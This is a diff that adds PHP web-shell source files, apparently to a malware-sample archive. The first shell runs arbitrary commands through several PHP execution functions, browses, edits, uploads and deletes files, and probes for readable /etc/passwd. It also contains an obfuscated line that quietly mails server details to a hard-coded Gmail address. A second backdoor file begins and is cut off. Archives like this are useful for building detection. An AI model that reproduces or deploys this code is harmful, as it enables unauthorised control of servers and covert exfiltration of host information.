    "; + echo ""; + } + + } + + } + if ($action=="cmd") { ?> +
    +
    + + + +
    +
    +
    ";
    +        if ($method=="system") {
    +        system("$cmd 2>&1");
    +        }
    +        if ($method=="passthru") {
    +        passthru("$cmd 2>&1");
    +        }
    +        if ($method=="exec") {
    +            while ($string = exec("$cmd 2>&1")) {
    +            echo $string;
    +            }
    +        }
    +        if ($method=="shell_exec") {
    +        $string = shell_exec("$cmd 2>&1");
    +        echo $string;
    +        }
    +        if ($method=="popen") {
    +        $pp = popen('$cmd 2>&1', 'r');
    +        $read = fread($pp, 2096);
    +        echo $read;
    +        pclose($pp);
    +        }
    +    echo "
    "; + } + + + if ($action=="cmdbrowse") { + //--------------------------------------------------- START CMD BROWSING + + if ($cat) { + echo "
    ";
    +        echo "\ngo back to: $olddir\n\n";
    +        exec("cat $cat 2>&1", $arr);
    +        foreach ($arr as $ar) {
    +        echo htmlspecialchars($ar)."\n";
    +        }
    +        exit;
    +        }
    +
    +
    +
    +            if ($dir=="dirup") {
    +            $dir_current = $olddir;
    +            $needle = strrpos($dir_current, "/");
    +                if ($needle==0) {
    +                    $newdir = "/";
    +                } else {
    +                    $newdir = substr($dir_current, 0, $needle);
    +                }
    +            $dir = $newdir;
    +            }
    +            if (!$dir) {
    +            $dir = getcwd();
    +            }
    +
    +        $string = exec("ls -al $dir", $array);
    +        //print_r(array_values($array));
    +
    +        echo "
    ";
    +            if ($dir!="/") {
    +            echo "\n[$dir] \ndirup\n\n";
    +            } else {
    +            $dir = "";
    +            }
    +        foreach($array as $rowi) {
    +        $row = explode(' ', $rowi);
    +        //print_r(array_values($row));
    +            $c = count($row)-1;
    +            if ($row[$c]!=".." && $row[$c]!="." && isset($first)) {
    +                $link = false;
    +                if (!strstr($row[0], 'l')) {
    +                $c = count($row)-1;
    +                $file = "".$row[$c]."";
    +                } else {
    +                $c = count($row)-3;
    +                $file = "".$row[$c]."";
    +                $link = true;
    +                }
    +                if (!strstr($row[0], 'l') && !strstr($row[0], 'd')) {
    +                $c = count($row)-1;
    +                $file = "".$row[$c]."";
    +                }
    +                //echo $row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." ".$row[8]." ".$row[9]." ".$row[10]." ".$file." ".$row[12]." ".$row[13]."\n";
    +                    if ($link) {
    +                    $point = count($row)-3;
    +                    } else {
    +                    $point = count($row)-1;
    +                    }
    +                for($i=0; $point > $i; $i++) {
    +                echo $row[$i]." ";
    +                }
    +                echo $file."\n";
    +            }
    +            $first = true;
    +        }
    +
    +    //--------------------------------------------------- END CMD BROWSING
    +    }
    +    if ($action=="browse") {
    +    //--------------------------------------------------- START BROWSING
    +    /*
    +     * got this from an old script of mine
    +     * param: [$dir]
    +    */
    +        function error($msg) {
    +        header("Location: $PHP_SELF?bash=$msg&error=$msg");
    +        }
    +        if (isset($error)) {
    +        echo "";
    +        }
    +        if (!$dir) {
    +        $dir = getcwd();
    +        }
    +           function getpath($dir) {
    +           echo "/ ";
    +              $path = explode('/', $dir);
    +              if ($dir != "/") {
    +            for ($i=0; count($path) > $i; $i++) {
    +                if ($i != 0) {
    +                echo " $o; $o++) {
    +                        echo "$path[$o]";
    +                        if (($i) !=$o) {
    +                        echo "/";
    +                        }
    +                    }
    +                echo ">$path[$i]/";
    +                }
    +            }
    +              }
    +            }
    +
    +            function printfiles($files) {
    +                for($i=0;count($files)>$i;$i++) {
    +                    $files_sm = explode('||', $files[$i]);
    +                        if ($files_sm[0]!="." && $files_sm[0]!="..") {
    +                        $perms = explode('|', $files_sm[1]);
    +                        if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
    +                        if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
    +                    }
    +                        if ($files_sm[2]=="1") { echo "l "; } else { echo "- "; }
    +                        if ($perms[0]==1) { echo "r"; } else { echo " "; }
    +                        if ($perms[1]==1) { echo "w"; } else { echo " "; }
    +                        if ($perms[2]==1) { echo "x"; } else { echo " "; }
    +                        echo " $files_sm[0]\n";
    +                    }
    +                }
    +            }
    +              $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
    +            function printdirs($files) {
    +                global $dir;
    +                echo "..\n";
    +                for($i=0;count($files)>$i;$i++) {
    +                    $files_sm = explode('||', $files[$i]);
    +                    if ($files_sm[0]!="." && $files_sm[0]!="..") {
    +                    $perms = explode('|', $files_sm[1]);
    +                    if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
    +                    if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
    +                }
    +                    if ($files_sm[2]=="1") { echo "l "; } else { echo "d "; }
    +                    if ($perms[0]==1) { echo "r"; } else { echo " "; }
    +                    if ($perms[1]==1) { echo "w"; } else { echo " "; }
    +                    if ($perms[2]==1) { echo "x"; } else { echo " "; }
    +                    echo " $files_sm[0]\n";
    +                }
    +                }
    +            }
    +
    +
    +            if ($dir=="dirup") {
    +            $dir_current = $olddir;
    +            $needle = strrpos($dir_current, "/");
    +                if ($needle==0) {
    +                    $newdir = "/";
    +                } else {
    +                    $newdir = substr($dir_current, 0, $needle);
    +                }
    +            $dir = $newdir;
    +            } else {
    +            $dir = $dir;
    +            }
    +
    +        ?>
    +         
    + + +
    +
    +
    ";
    +                printdirs($dirs);
    +                printfiles($files);
    +                } else { echo " "; }
    +        }
    +    }
    +    //--------------------------------------------------- END BROWSING
    +    //--------------------------------------------------- BEGIN EXPLORER
    +if ($action == explorer ) {
    +
    +   $default_directory = dirname($PATH_TRANSLATED);
    +   $show_icons = 0;
    +
    +
    +   define("BACKGROUND_COLOR",       "\"#000000\"");
    +   define("FONT_COLOR",             "\"#CCCCCC\"");
    +   define("TABLE_BORDER_COLOR",     "\"#000000\"");
    +   define("TABLE_BACKGROUND_COLOR", "\"#000000\"");
    +   define("TABLE_FONT_COLOR",       "\"#000000\"");
    +   define("COLOR_PRIVATE",          "\"#000000\"");
    +   define("COLOR_PUBLIC",           "\"#000000\"");
    +   define("TRUE",                   1);
    +   define("FALSE",                  0);
    +
    +
    +
    +   if (!isset($dir)) $dir = $default_directory;   // Webroot dir as default
    +   $dir = stripslashes($dir);
    +   $dir = str_replace("\\", "/", $dir);         // Windoze compatibility
    +
    +
    +   $associations = array(
    +      "gif" =>  array(   "function" => "viewGIF",   "icon" => "icons/image2.gif"    ),
    +      "jpg" =>  array(   "function" => "viewJPEG",  "icon" => "icons/image2.gif"    ),
    +      "jpeg" => array(   "function" => "viewJPEG",  "icon" => "icons/image2.gif"    ),
    +      "wav" =>  array(   "function" => "",          "icon" => "icons/sound.gif"     ),
    +      "mp3" =>  array(   "function" => "",          "icon" => "icons/sound.gif"     )
    +   );
    +
    +   if ($do != "view" && $do != "download"):
    +    endif;
    +
    +   function readDirectory($directory) {
    +      global $files, $directories, $dir;
    +
    +      $files = array();
    +      $directories = array();
    +      $a = 0;
    +      $b = 0;
    +
    +      $dirHandler = opendir($directory);
    +
    +      while ($file = readdir($dirHandler)) {
    +         if ($file != "." && $file != "..") {
    +            $fullName = $dir.($dir == "/" ? "" : "/").$file;
    +            if (is_dir($fullName)) $directories[$a++] = $fullName;
    +            else $files[$b++] = $fullName;
    +         }
    +      }
    +      sort($directories);                    // We want them to be displayed alphabetically
    +      sort($files);
    +   };
    +
    +
    +
    +   function showInfoDirectory($directory) {
    +      global $PHP_SELF;
    +      $dirs = split("/", $directory);
    +      print "Directory /";
    +      for ($i = 1; $i < (sizeof($dirs)); $i++) {
    +         print "$dirs[$i]";
    +         if ($directory != "/") echo "/";
    +      }
    +      print "
    \n"; + print "Free space on disk: "; + $freeSpace = diskfreespace($directory); + if ($freeSpace/(1024*1024) > 1024) + printf("%.2f GBytes", $freeSpace/(1024*1024*1024)); + else echo (int)($freeSpace/(1024*1024))."Mbytes\n"; + }; + + + function showDirectory($directory) { + global $files, $directories, $fileInfo, $PHP_SELF; + + readDirectory($directory); + showInfoDirectory($directory); +?> +

    > + + + + + + + + + + +getInfo($directories[$i]); + showFileInfo($fileInfo); + } + for ($i = 0; $i < sizeof($files); $i++) { + $fileInfo->getInfo($files[$i]); + showFileInfo($fileInfo); + } +?> +
    NAMESIZELAST MODIFYPERMISIONSACTIONS
    +name = basename($file); + $this->path = dirname($file); + $this->fullname = $file; + $this->isDir = is_dir($file); + $this->lastmod = date("m/d/y, H:i", filemtime($file)); + $this->owner = fileowner($file); + $this->perms = $this->permissions(fileperms($file)); + $this->size = filesize($file); + $this->isLink = is_link($file); + if ($this->isLink) $this->linkTo = readlink($file); + $buffer = explode(".", $this->fullname); + $this->extension = $buffer[sizeof($buffer)-1]; + } + }; + + $fileInfo = new fileInfo; // This will hold a file's information all over the script + + function showFileInfo($fileInfo) { + global $PHP_SELF, $associations; + + echo "\n"; + + if ($show_icons) { + echo ""; + if ($fileInfo->isDir) echo ""; + elseif ($associations[$fileInfo->extension]["icon"] != "") + echo "extension]["icon"]."\">"; + else echo ""; + echo ""; + } + + echo "perms[7] == "w") echo " bgcolor=".COLOR_PUBLIC; + if ($fileInfo->perms[6] == "-") echo " bgcolor=".COLOR_PRIVATE; + echo ">"; + + if ($fileInfo->isLink) { + echo $fileInfo->name." -> "; + $fileInfo->fullname = $fileInfo->linkTo; + $fileInfo->name = $fileInfo->linkTo; + } + + if ($fileInfo->isDir) { + echo "fullname\" "; + echo ">$fileInfo->name"; + } + else echo $fileInfo->name; + + echo ""; + echo "$fileInfo->size"; + echo "$fileInfo->lastmod"; + echo "$fileInfo->perms"; + echo ""; + + if (!$fileInfo->isDir) { + if ($fileInfo->perms[6] == 'r') { + echo "fullname&do=view\"> V"; + echo " fullname&do=download\">D"; + } + if ($fileInfo->perms[7] == 'w') { + echo " fullname&do=edit\">E"; + echo " fullname&do=delete\">X"; + } + } + echo ""; + }; + + //************************************************************************ + //* Decides which function use to show a file + //************************************************************************ + + function viewFile($file) { + global $associations, $fileInfo; + $fileInfo->getInfo($file); + if (!$associations[$fileInfo->extension] + || $associations[$fileInfo->extension]["function"] == "") showFile($file); + else $associations[$fileInfo->extension]["function"]($file); + }; + + function showFile($file, $editing = 0) { + global $PHP_SELF, $dir; + $handlerFile = fopen($file, "r") or die("ERROR opening file $file"); + + if ($editing) echo "

    Edit file $file


    "; + else echo "

    File $file


    "; + + echo ""; + + $buffer = fread($handlerFile, filesize($file)); + $buffer = str_replace("&", "&", $buffer); + $buffer = str_replace("<", "<", $buffer); + $buffer = str_replace(">", ">", $buffer); + + echo "
    "; + if ($editing) echo "

    \n"; + echo ""; + fclose($handlerFile); + }; + + //************************************************************************ + //* Saves a changed file + //************************************************************************ + + function saveFile($file) { + global $dir, $text; + $handlerFile = fopen($file, "w") or die("ERROR: Could not open file ".basename($file)." for writing"); + $text = stripslashes($text); + fwrite($handlerFile, $text, strlen($text)) or die("Error writing to file."); + fclose($handlerFile); + echo "Changes has been saved in ".basename($file)."
    "; + $dir = dirname($file); + }; + + + function uploadFile() { + global $HTTP_POST_FILES, $dir; + copy($HTTP_POST_FILES["userfile"][tmp_name], + $dir."/".$HTTP_POST_FILES["userfile"][name]) + or die("Error uploading file".$HTTP_POST_FILES["userfile"][name]); + + echo "File ".$HTTP_POST_FILES["userfile"][name]." succesfully uploaded."; + unlink($userfile); + }; + + //************************************************************************ + //* Deletes a file, asking for confirmation first + //* (This function hasn't been fully tested) + //************************************************************************ + + function deleteFile($file) { + global $confirm; + if ($confirm != TRUE) die("Confirm deletion of $file"); + else { + if (!unlink($file)) return FALSE; + return TRUE; + } + }; + + + function viewFileHeader($file, $header) { + header($header); + readfile($file); + }; + + + function viewGIF($file) { + viewFileHeader($file, "Content-type: image/gif"); + }; + + function viewJPEG($file) { + viewFileHeader($file, "Content-type: image/jpeg"); + }; + + switch ($do) { + case "phpinfo": + phpinfo(); + die(); + case "view": + viewFile($dir); + break; + case "edit": + showFile($dir, 1); + break; + case "download": + viewFileHeader($dir, "Content-type: unknown"); + break; + case "delete": + if (!deleteFile($dir)) echo "Could not delete file $dir
    "; + else echo "File $dir deleted succesfully
    "; + $dir = dirname($dir); + showDirectory($dir); + break; + case "exec": + echo "
    \n";
    +         echo system($dir);
    +         echo "\n
    "; + exit(); + case "upload": + uploadFile(); + showDirectory($dir); + break; + case "save": + saveFile($dir); + default: + showDirectory($dir); + break; + }; + + if ($do != "view" && $do != "download") { +?> +

    + + + + + +
    +
    " method=post> + + + +
    +
    +

    +

    + + +

    phpinfo

    "; + if ($mysql_use!="no") { + $phpcheck = new php_check_silent($mhost, $muser, $mpass, $mdb); + } else { $phpcheck = new php_check_silent(); } +echo "
    "; + +?>

    + +Security Check [executable] + +
    + + +cmd_state; +//echo $phpcheck->cmd_method; +if ($phpcheck->cmd_method) { $cmd_method = $phpcheck->cmd_method; } else { $cmd_method = "system"; } ?> +Exec commands by PHP +cmd_method) { +echo "[executable] "; } else { echo "[not executable]"; } + +?> + +
    + + +cmd_state; +//echo $phpcheck->cmd_method; +?> +Exec browse by PHP +cmd_method) { +echo "[executable] "; } else { echo "[not executable]"; } + +?> + +
    + + +read_method) { $read_method = $phpcheck->read_method; } else { $read_method = "file"; } ?> +Read by PHP +read_method) { +echo "[executable] "; } else { echo "[not executable]"; } +?> + +
    + + +browse_state; +if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?> +Browse by PHP +browse_state=="yes") { +echo "[executable] "; } else { echo "[limited executable]"; } +?> + +
    +browse_state; +if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?> +File Explorer by PHP +browse_state=="yes") { +echo "[executable] "; } else { echo "[limited executable]"; } +?> + +
    + + + +Read by MySQL +mysql_state=="ok") { + echo "[executable] "; } + if ($phpcheck->mysql_state=="fail") { + echo "[not executable] "; } + if ($phpcheck->mysql_state=="pass") { + echo "[not executable] "; + ?> [you didnt configure this] + + + +mysql_do = "yes"; + $this->mysql_host = $host; + $this->mysql_user = $user; + $this->mysql_pass = $pass; + $this->mysql_db = $db; + } else { $this->mysql_do = "no"; } + + $this->mainstate = "safe"; + + echo "checking system functions:\n"; + if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); } + echo "checking reading functions:\n"; + if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); } + echo "checking misc filesystem functions:\n"; + if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); } + echo "checking mysql functions:\n"; + $stater = $this->mysql_checks(); + if ($stater==2) { $this->output_mainstate(2, "mysql checks"); } + if ($stater==1) { $this->output_mainstate(1, "mysql checks"); } + if ($stater==0) { $this->output_mainstate(0, "mysql checks"); } + if ($this->mainstate=="safe") { echo "\n\n\nPHP check returned: NOT VULNERABLE\n"; } else { echo "\n\n\nPHP check returned: VULNERABLE\n"; } + } + + + function output_state($state = 0, $name = "function") { + if ($state==0) { + echo "$name\t\tfailed\n"; + } + if ($state==1) { + echo "$name\t\tOK\n"; + } + if ($state==2) { + echo "$name\t\tOK\n"; + } + if ($state==3) { + echo "$name\t\tskipped\n"; + } + } + + function output_mainstate($state = 0, $name = "functions") { + if ($state==1) { + echo "\n$name returned: VULNERABLE\n\n"; + $this->mainstate = "unsafe"; + } + if ($state==0) { + echo "\n$name returned: OK\n\n"; + $this->mainstate = "unsafe"; + } + if ($state==2) { + echo "\n$name returned: SKIPPED\n\n"; + } + } + + function system_checks($cmd = "/bin/ls") { + if ($pp = popen($cmd, "r")) { + if (fread($pp, 2096)) { + $this->output_state(1, "popen "); + $sys = true; + } else { + $this->output_state(0, "popen "); + } + } else { $this->output_state(0, "popen "); } + if (@exec($cmd)) { $this->output_state(1, "exec "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec "); } + if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); } + echo ""; $this->output_state(1, "system "); $ss = true; $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system "); } + echo ""; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); } + //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); } + if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; } + } + + function reading_checks($file = "/etc/passwd") { + if (@function_exists("require_once")) { + echo ""; $this->output_state(1, "require_once"); $sys = true; } else { echo "-->"; $this->output_state(0, "require_once"); } + } + if (@function_exists("require")) { + echo ""; $this->output_state(1, "require "); $sys = true; } else { echo "-->"; $this->output_state(0, "require "); } + } + if (@function_exists("include")) { + echo ""; $this->output_state(1, "include "); $sys = true; } else { echo "-->"; $this->output_state(0, "include "); } + } + //if (@function_exists("highlight_file")) { + echo ""; $this->output_state(1, "highlight_file"); $sys = true; } else { echo "-->"; $this->output_state(0, "highlight_file"); } + //} + //if (@function_exists("virtual")) { + echo ""; $this->output_state(1, "virtual "); $sys = true; } else { echo "-->"; $this->output_state(0, "virtual "); } + //} + if (@function_exists("file_get_contents")) { + if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); } + } else { + $this->output_state(0, "filegetcontents"); + } + echo ""; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); } + echo ""; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); } + if (@fopen($file, "r")) { $this->output_state(1, "fopen "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen "); } + if (@file($file)) { $this->output_state(1, "file "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file "); } + if ($sys) { return 1; } else { return ; } + } + + function miscfile_checks() { + $currentdir = @getcwd(); + $scriptpath = $_SERVER["PATH_TRANSLATED"]; + if (@opendir($currentdir)) { + $this->output_state(2, "opendir \$cwd"); + $dp = @opendir("$currentdir"); + $files=""; + $this->browse_state = "lim"; + while($file = @readdir($dp)) { $files .= $file; } + if (@strstr($files, '.')) { $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); } + + } else { $this->output_state(0, "opendir \$cwd"); } + if (@opendir("/")) { + $this->output_state(1, "opendir /"); + $sys = true; + $dp = @opendir("/"); + $this->browse_state = "yes"; + $files=""; + while($file = @readdir($dp)) { $files .= $file; } + if (@strstr($files, '.')) { $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); } + } else { $this->output_state(0, "opendir /"); } + if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir "); $sys = true; } else { $this->output_state(0, "mkdir "); } + if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir "); $sys = true; } else { $this->output_state(0, "rmdir "); } + if (@copy($scriptpath, "$currentdir/copytest")) { + $this->output_state(2, "copy "); + $sys = true; + if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } + } else { + $this->output_state(0, "copy "); + } + if (@copy($scriptpath, "/tmp/copytest")) { + $this->output_state(2, "copy2/tmp"); + //$sys = true; + if (!$del) { + if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } + } + } else { + $this->output_state(0, "copy2/tmp"); + } + if (@link("/", "$currentdir/link2root")) { + $this->output_state(1, "link "); + $sys = true; + if (!$del) { + if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } + } + } else { + $this->output_state(0, "link "); + } + if (@symlink("/", "$currentdir/link2root")) { + $this->output_state(1, "symlink "); + $sys = true; + if (!$del) { + if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } + } + } else { + $this->output_state(0, "symlink "); + } + if ($sys) { return 1; } else { return ; } + } + + function mysql_checks() { + if ($this->mysql_do=="yes") { + if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) { + $this->output_state(1, "mysql_pconnect"); $mstate = 1; + } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; } + } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; } + if ($this->mysql_do=="yes") { + if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) { + $this->output_state(1, "mysql_connect"); $mstate = 1; + } else { $this->output_state(0, "mysql_connect"); $mstate = 0; } + } else { $this->output_state(3, "mysql_connect"); $mstate = 2; } + if ($this->mysql_state=="fail") { + echo "\n\n\n\n"; + echo ""; + } + return $mstate; + } + } + + class php_check_silent + { + + function php_check_silent($host="notset", $username="", $pass="", $db="") { + if ($host!="notset") { + $this->mysql_do = "yes"; + $this->mysql_host = $host; + $this->mysql_user = $username; + $this->mysql_pass = $pass; + $this->mysql_db = $db; + } else { $this->mysql_do = "no"; } + + $this->mainstate = "safe"; + + if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); } + if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); } + if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); } + $this->mysql_checks(); + } + + + function output_state($state = 0, $name = "function") { + if ($state==0) { + //echo "$name\t\tfailed\n"; + } + if ($state==1) { + //echo "$name\t\tOK\n"; + } + if ($state==2) { + //echo "$name\t\tOK\n"; + } + } + function output_mainstate($state = 0, $name = "functions") { + if ($state==1) { + //echo "\n$name returned: VULNERABLE\n\n"; + $this->mainstate = "unsafe"; + } else { + //echo "\n$name returned: OK\n\n"; + } + } + + function system_checks($cmd = "/bin/ls") { + if ($pp = popen($cmd, "r")) { + if (fread($pp, 2096)) { + $this->output_state(1, "popen "); + $sys = true; + } else { + $this->output_state(0, "popen "); + } + } else { $this->output_state(0, "popen "); } + if (@exec($cmd)) { $this->output_state(1, "exec "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec "); } + if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); } + echo ""; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); } + echo ""; $this->output_state(1, "system "); $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system "); } + //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); } + if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; } + } + + function reading_checks($file = "/etc/passwd") { + if (@function_exists("require_once")) { + if (@require_once($file)) { $this->output_state(1, "require_once"); $sys = true; } else { $this->output_state(0, "require_once"); } + } + if (@function_exists("require")) { + if (@require($file)) { $this->output_state(1, "require"); $sys = true; } else { $this->output_state(0, "require"); } + } + if (@function_exists("include")) { + if (@include($file)) { $this->output_state(1, "include "); $sys = true; } else { $this->output_state(0, "include "); } + } + if (@function_exists("file_get_contents")) { + if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); } + } else { + $this->output_state(0, "filegetcontents"); + } + echo ""; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); } + echo ""; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); } + if (@fopen($file, "r")) { $this->output_state(1, "fopen "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen "); } + if (@file($file)) { $this->output_state(1, "file "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file "); } + if ($sys) { return 1; } else { return ; } + } + + function miscfile_checks() { + $currentdir = @getcwd(); + $scriptpath = $_SERVER["PATH_TRANSLATED"]; + if (@opendir($currentdir)) { + $this->output_state(2, "opendir \$cwd"); + $dp = @opendir("$currentdir"); + $files=""; + $this->browse_state = "lim"; + while($file = @readdir($dp)) { $files .= $file; } + if (@strstr($files, '.')) { $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); } + + } else { $this->output_state(0, "opendir \$cwd"); } + if (@opendir("/")) { + $this->output_state(1, "opendir /"); + $sys = true; + $dp = @opendir("/"); + $this->browse_state = "yes"; + $files=""; + while($file = @readdir($dp)) { $files .= $file; } + if (@strstr($files, '.')) { $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); } + } else { $this->output_state(0, "opendir /"); } + if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir "); $sys = true; } else { $this->output_state(0, "mkdir "); } + if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir "); $sys = true; } else { $this->output_state(0, "rmdir "); } + if (@copy($scriptpath, "$currentdir/copytest")) { + $this->output_state(2, "copy "); + $sys = true; + if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } + } else { + $this->output_state(0, "copy "); + } + if (@copy($scriptpath, "/tmp/copytest")) { + $this->output_state(2, "copy2/tmp"); + //$sys = true; + if (!$del) { + if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } + } + } else { + $this->output_state(0, "copy2/tmp"); + } + if (@link("/", "$currentdir/link2root")) { + $this->output_state(1, "link "); + $sys = true; + if (!$del) { + if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } + } + } else { + $this->output_state(0, "link "); + } + if (@symlink("/", "$currentdir/link2root")) { + $this->output_state(1, "symlink "); + $sys = true; + if (!$del) { + if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } + } + } else { + $this->output_state(0, "symlink "); + } + if ($sys) { return 1; } else { return ; } + } + function mysql_checks() { + if ($this->mysql_do=="yes") { + if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) { + $this->output_state(1, "mysql_pconnect"); $mstate = 1; $this->mysql_state = "ok"; + } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; $this->mysql_state = "fail"; } + } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; $this->mysql_state = "pass"; } + if ($this->mysql_do=="yes") { + if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) { + $this->output_state(1, "mysql_connect"); $mstate = 1; $this->mysql_state = "ok"; + } else { $this->output_state(0, "mysql_connect"); $mstate = 0; $this->mysql_state = "fail"; } + } else { $this->output_state(3, "mysql_connect"); $mstate = 2; $this->mysql_state = "pass"; } + if ($this->mysql_state=="fail") { + echo ""; + echo ""; + } + return $mstate; + } + } + + + +// the end :] +?> +
    Copyright © 2003 BSV Groups +
    PHP Shell Support by DTN \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.s b/PHP/Backdoor.PHP.Agent.s new file mode 100644 index 00000000..2840e649 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.s @@ -0,0 +1,1492 @@ + compressedData[] = $feedArrayRow; + + $newOffset = strlen(implode("", $this->compressedData)); + + $addCentralRecord = "\x50\x4b\x01\x02"; + $addCentralRecord .="\x00\x00"; + $addCentralRecord .="\x14\x00"; + $addCentralRecord .="\x00\x00"; + $addCentralRecord .="\x08\x00"; + $addCentralRecord .="\x00\x00\x00\x00"; + $addCentralRecord .= pack("V",$compression); + $addCentralRecord .= pack("V",$compressedLength); + $addCentralRecord .= pack("V",$uncompressedLength); + $addCentralRecord .= pack("v", strlen($directoryName) ); + $addCentralRecord .= pack("v", 0 ); + $addCentralRecord .= pack("v", 0 ); + $addCentralRecord .= pack("v", 0 ); + $addCentralRecord .= pack("v", 0 ); + $addCentralRecord .= pack("V", 32 ); + + $addCentralRecord .= pack("V", $this -> oldOffset ); + $this -> oldOffset = $newOffset; + + $addCentralRecord .= $directoryName; + + $this -> centralDirectory[] = $addCentralRecord; + } + + function getZippedfile() { + + $data = implode("", $this -> compressedData); + $controlDirectory = implode("", $this -> centralDirectory); + + return + $data. + $controlDirectory. + $this -> endOfCentralDirectory. + pack("v", sizeof($this -> centralDirectory)). + pack("v", sizeof($this -> centralDirectory)). + pack("V", strlen($controlDirectory)). + pack("V", strlen($data)). + "\x00\x00"; + } +} + + +function compress(&$filedump) +{ + global $content_encoding; + global $mime_type; + if (@function_exists('gzencode')) + { + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = @gzencode($filedump); + } + else + { + $mime_type = 'application/octet-stream'; + } +} + +function make_zip($files) +{ + if (@function_exists('gzcompress')) + { + $zipfile = new createZip(); + foreach ($files as $filename) + { + $filedump = eat_file($filename); 